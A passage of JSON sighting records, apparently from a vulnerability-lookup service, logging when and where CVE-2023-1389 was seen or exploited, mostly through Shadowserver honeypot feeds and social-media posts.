"The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-21)", "content": "", "creation_timestamp": "2025-03-21T00:00:00.000000Z"}, {"uuid": "982ab7de-d89c-4aa6-8e7a-a6b927285cf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-28)", "content": "", "creation_timestamp": "2025-02-28T00:00:00.000000Z"}, {"uuid": "9e0bbdef-e331-43bc-98f5-f8cddb8fd5e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://mastodon.social/users/hrbrmstr/statuses/114183260221054460", "content": "", "creation_timestamp": "2025-03-18T11:44:43.252658Z"}, {"uuid": "a744b94f-ce52-44a5-ae68-cae00b418467", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/hrbrmstr.dev/post/3lknlrthzwj2z", "content": "", "creation_timestamp": "2025-03-18T11:45:06.359280Z"}, {"uuid": "a8c70677-3fa0-4a4b-b5da-46164b6ce518", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/solidot.bsky.social/post/3lk6ovipn5s27", "content": "", "creation_timestamp": "2025-03-12T13:30:54.264477Z"}, {"uuid": "53e40cb4-4751-4aa2-b1ee-a6b9073b3556", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-13)", "content": "", "creation_timestamp": "2025-06-13T00:00:00.000000Z"}, {"uuid": "2edfcc80-7c7f-48d9-a4fe-6407ef23b5c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-11)", "content": "", "creation_timestamp": "2025-07-11T00:00:00.000000Z"}, {"uuid": "e973f2bb-4929-4ab8-8ae5-ca35b66d4cb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-08)", "content": "", "creation_timestamp": "2025-03-08T00:00:00.000000Z"}, {"uuid": "746d697a-0ed6-4d21-b3e0-073ef92628bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-14)", "content": "", "creation_timestamp": "2025-07-14T00:00:00.000000Z"}, {"uuid": "8d71b0b7-0e20-4711-9808-a1fefc70079b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-07)", "content": "", "creation_timestamp": "2025-06-07T00:00:00.000000Z"}, {"uuid": "ea182697-23ae-4ba9-8d11-071a528e43dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-11)", "content": "", "creation_timestamp": "2025-06-11T00:00:00.000000Z"}, {"uuid": "eb25a860-e024-4824-a148-eb065f3bb1fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-16)", "content": "", "creation_timestamp": "2025-06-16T00:00:00.000000Z"}, {"uuid": "ac7b9280-792e-4433-81f2-6f42a57109a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2023/CVE-2023-1389.yaml", "content": "", "creation_timestamp": "2025-05-22T10:05:44.000000Z"}, {"uuid": "24eda3ad-2ede-479f-bc49-a523aea6933e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-28)", "content": "", "creation_timestamp": "2025-05-28T00:00:00.000000Z"}, {"uuid": "155618ac-21d9-4733-a24b-43c986502ebf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-20)", "content": "", "creation_timestamp": "2025-04-20T00:00:00.000000Z"}, {"uuid": "47835130-3b7d-4848-82a1-aa65ccb13177", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-03)", "content": "", "creation_timestamp": "2025-06-03T00:00:00.000000Z"}, {"uuid": "1c33c0b0-8772-408f-a73c-487ebbc41a40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-24)", "content": "", "creation_timestamp": "2025-04-24T00:00:00.000000Z"}, {"uuid": "b189ec18-359a-47d9-84cf-81e1a8d09a73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-22)", "content": "", "creation_timestamp": "2025-04-22T00:00:00.000000Z"}, {"uuid": "59c4a8fc-bb0b-42b7-81ec-8067b88aeff9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-30)", "content": "", "creation_timestamp": "2025-05-30T00:00:00.000000Z"}, {"uuid": "ac0f7ee6-cc3a-4830-97ce-2297585f0537", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-08)", "content": "", "creation_timestamp": "2025-06-08T00:00:00.000000Z"}, {"uuid": "2fcc1f9f-77d4-45aa-b474-a2ffbdffdd0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-07)", "content": "", "creation_timestamp": "2025-07-07T00:00:00.000000Z"}, {"uuid": "0731681f-4806-44fe-8b17-01e5e7741f24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-25)", "content": "", "creation_timestamp": "2025-04-25T00:00:00.000000Z"}, {"uuid": "aa24a569-fbf9-4a43-90a7-df363e205861", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-26)", "content": "", "creation_timestamp": "2025-04-26T00:00:00.000000Z"}, {"uuid": "d030aeab-ff51-4093-a3c2-d87ad3a52e25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-26)", "content": "", "creation_timestamp": "2025-04-26T00:00:00.000000Z"}, {"uuid": "07898310-864b-4b46-bcec-e43a39237ed6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-06)", "content": "", "creation_timestamp": "2025-05-06T00:00:00.000000Z"}, {"uuid": "a225469d-9df9-4612-9111-769b1fc49d7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-03)", "content": "", "creation_timestamp": "2025-05-03T00:00:00.000000Z"}, {"uuid": "00bca3ff-87c3-48cb-9b4e-b36a83cac627", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-13)", "content": "", "creation_timestamp": "2025-07-13T00:00:00.000000Z"}, {"uuid": "48bde3e1-ed0a-4a24-b955-6b31b5315231", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-02)", "content": "", "creation_timestamp": "2025-06-02T00:00:00.000000Z"}, {"uuid": "b80e20f5-40bb-42ce-b6aa-541ecec56629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-01)", "content": "", "creation_timestamp": "2025-05-01T00:00:00.000000Z"}, {"uuid": "263f72b8-3bc1-4a88-87ef-74cf0dd324cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-31)", "content": "", "creation_timestamp": "2025-05-31T00:00:00.000000Z"}, {"uuid": "fbc2aadd-5d37-46b7-a59e-3a16bacc78b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-12)", "content": "", "creation_timestamp": "2025-06-12T00:00:00.000000Z"}, {"uuid": "4a28e785-8f9e-48a3-bcec-abb36b31e26a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-07)", "content": "", "creation_timestamp": "2025-05-07T00:00:00.000000Z"}, {"uuid": "6dc9fd61-a39d-4524-a336-6e3d3f3c8270", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-02)", "content": "", "creation_timestamp": "2025-07-02T00:00:00.000000Z"}, {"uuid": "99e0a9a5-a7fa-43be-b113-4798d39cdc47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-06)", "content": "", "creation_timestamp": "2025-05-06T00:00:00.000000Z"}, {"uuid": "8b278dcd-4d54-4874-8ecf-4124411f3404", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-07)", "content": "", "creation_timestamp": "2025-05-07T00:00:00.000000Z"}, {"uuid": "f1949d2b-9e22-4710-b3c3-cbd5eaf7c2ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-09)", "content": "", "creation_timestamp": "2025-05-09T00:00:00.000000Z"}, {"uuid": "0e32fd5f-bc93-4802-83b9-4319027bebef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-15)", "content": "", "creation_timestamp": "2025-06-15T00:00:00.000000Z"}, {"uuid": "d0645e66-51eb-48e6-b84d-7947d776a2de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-08)", "content": "", "creation_timestamp": "2025-05-08T00:00:00.000000Z"}, {"uuid": "ff82868f-d2be-4928-8bc9-6dae96bb6fc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-08)", "content": "", "creation_timestamp": "2025-05-08T00:00:00.000000Z"}, {"uuid": "9d79ddfb-1878-4a59-870a-ea5ff0345415", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-10)", "content": "", "creation_timestamp": "2025-05-10T00:00:00.000000Z"}, {"uuid": "91abd1d4-bd78-4da6-a47d-4b0396d4d727", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-21)", "content": "", "creation_timestamp": "2025-07-21T00:00:00.000000Z"}, {"uuid": "8792a681-a8cb-4d0d-9b03-99cd028e4589", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-19)", "content": "", "creation_timestamp": "2025-09-19T00:00:00.000000Z"}, {"uuid": "2cebb4dd-26c9-444b-9760-7dc79323bc95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lpujowt4cw2c", "content": "", "creation_timestamp": "2025-05-23T21:02:23.955670Z"}, {"uuid": "e8436bbe-f5d2-4300-83b0-ff27f2535ad8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3m6wgsk5tke26", "content": "", "creation_timestamp": "2025-12-01T12:33:51.723906Z"}, {"uuid": "9dd8f3ec-bb5c-40be-8e8e-46ba53f2fbb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-20)", "content": "", "creation_timestamp": "2025-07-20T00:00:00.000000Z"}, {"uuid": "3fd6a8a5-38d7-4bcc-b43d-d25e783a55a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-29)", "content": "", "creation_timestamp": "2025-07-29T00:00:00.000000Z"}, {"uuid": "999df17b-b2d2-4f6c-9daa-bd64209e17d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-28)", "content": "", "creation_timestamp": "2025-07-28T00:00:00.000000Z"}, {"uuid": "b6eb73cd-16f2-4908-aa80-a41b24da64ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/f5labs.bsky.social/post/3lupz2sfmn72x", "content": "", "creation_timestamp": "2025-07-24T17:00:01.911414Z"}, {"uuid": "2a275eb7-6b69-4db1-8414-14c779853d5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-06)", "content": "", "creation_timestamp": "2025-09-06T00:00:00.000000Z"}, {"uuid": "042ded5d-f006-49ae-949b-f4a9b73f8b1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-20)", "content": "", "creation_timestamp": "2025-09-20T00:00:00.000000Z"}, {"uuid": "f0b018f2-016e-4cf3-a204-4b6fceaa2561", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-03)", "content": "", "creation_timestamp": "2025-08-03T00:00:00.000000Z"}, {"uuid": "17106d7f-9fe2-48e5-a48b-2692740150d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-04)", "content": "", "creation_timestamp": "2025-08-04T00:00:00.000000Z"}, {"uuid": "60963072-24fc-4642-b393-587767881254", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-31)", "content": "", "creation_timestamp": "2025-10-31T00:00:00.000000Z"}, {"uuid": "cb039016-25e1-4a47-8747-f70dafb86edf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-28)", "content": "", "creation_timestamp": "2025-11-28T00:00:00.000000Z"}, {"uuid": "ef35910f-209e-4312-a74b-0892cf3454f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-22)", "content": "", "creation_timestamp": "2025-11-22T00:00:00.000000Z"}, {"uuid": "ba635823-6ef0-409d-9507-c79b07247324", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://infosec.exchange/users/edwardk/statuses/115349687488265913", "content": "", "creation_timestamp": "2025-10-10T11:42:30.337065Z"}, {"uuid": "4bc8ba91-24e6-4daf-becc-100e745db3b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "MISP/a41d8549-5384-5e1a-8c33-bf88e35b5a0a", "content": "", "creation_timestamp": "2025-10-14T10:31:48.000000Z"}, {"uuid": "493d9757-b616-440a-add5-70b871cafb5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-19)", "content": "", "creation_timestamp": "2025-11-19T00:00:00.000000Z"}, {"uuid": "354d8e7f-6212-4fb2-b6c9-26e3d0072d60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-7d94594b-ae20c1dc5483d2a2", "content": "", "creation_timestamp": "2025-10-11T06:19:00.011523Z"}, {"uuid": "0136afae-c946-4655-9055-bed9299db3a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://threatintel.cc/2025/10/10/rondodox-botnet-targets-nday-flaws.html", "content": "", "creation_timestamp": "2025-10-10T09:42:20.000000Z"}, {"uuid": "1bca2f37-5442-411c-9efd-c37ce97679b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-20)", "content": "", "creation_timestamp": "2025-08-20T00:00:00.000000Z"}, {"uuid": "a9386536-e53c-444d-8770-be30c19d086f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-25)", "content": "", "creation_timestamp": "2025-11-25T00:00:00.000000Z"}, {"uuid": "6e85b272-193c-4340-b8e6-db98803f757c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-04)", "content": "", "creation_timestamp": "2025-10-04T00:00:00.000000Z"}, {"uuid": "5728e57c-8b30-4baf-9612-6681a0a54d6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-22)", "content": "", "creation_timestamp": "2025-08-22T00:00:00.000000Z"}, {"uuid": "bbe1be65-bd4f-4527-824c-eab059445a75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-30)", "content": "", "creation_timestamp": "2025-10-30T00:00:00.000000Z"}, {"uuid": "144726d1-fed5-42d9-be14-4836ad119399", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-27)", "content": "", "creation_timestamp": "2025-11-27T00:00:00.000000Z"}, {"uuid": "04afe9d1-f77d-478f-ac7d-46e15d0a0f8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-24)", "content": "", "creation_timestamp": "2025-11-24T00:00:00.000000Z"}, {"uuid": "adbe252f-f02f-415e-8c48-7e1a3f884ed7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-26)", "content": "", "creation_timestamp": "2025-11-26T00:00:00.000000Z"}, {"uuid": "8f9b018a-090f-4819-8553-13465c2d6ecf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-23)", "content": "", "creation_timestamp": "2025-08-23T00:00:00.000000Z"}, {"uuid": "bffda93f-28dc-4161-b729-98532c5a15d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-09)", "content": "", "creation_timestamp": "2025-11-09T00:00:00.000000Z"}, {"uuid": "6e44f62c-6fae-4806-9ba0-534a3d126db1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-29)", "content": "", "creation_timestamp": "2025-11-29T00:00:00.000000Z"}, {"uuid": "1265ffd1-c534-40a8-8f76-60ccc46d1495", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-26)", "content": "", "creation_timestamp": "2025-08-26T00:00:00.000000Z"}, {"uuid": "b257d59c-9153-4807-a250-92e14882d7b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-24)", "content": "", "creation_timestamp": "2025-08-24T00:00:00.000000Z"}, {"uuid": "bd5e86ba-3e94-45bb-b838-9fc0e6b3f6bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-23)", "content": "", "creation_timestamp": "2025-11-23T00:00:00.000000Z"}, {"uuid": "95c32796-bb42-457f-897f-884c730ca6c8", "vulnerability_lookup_origin": 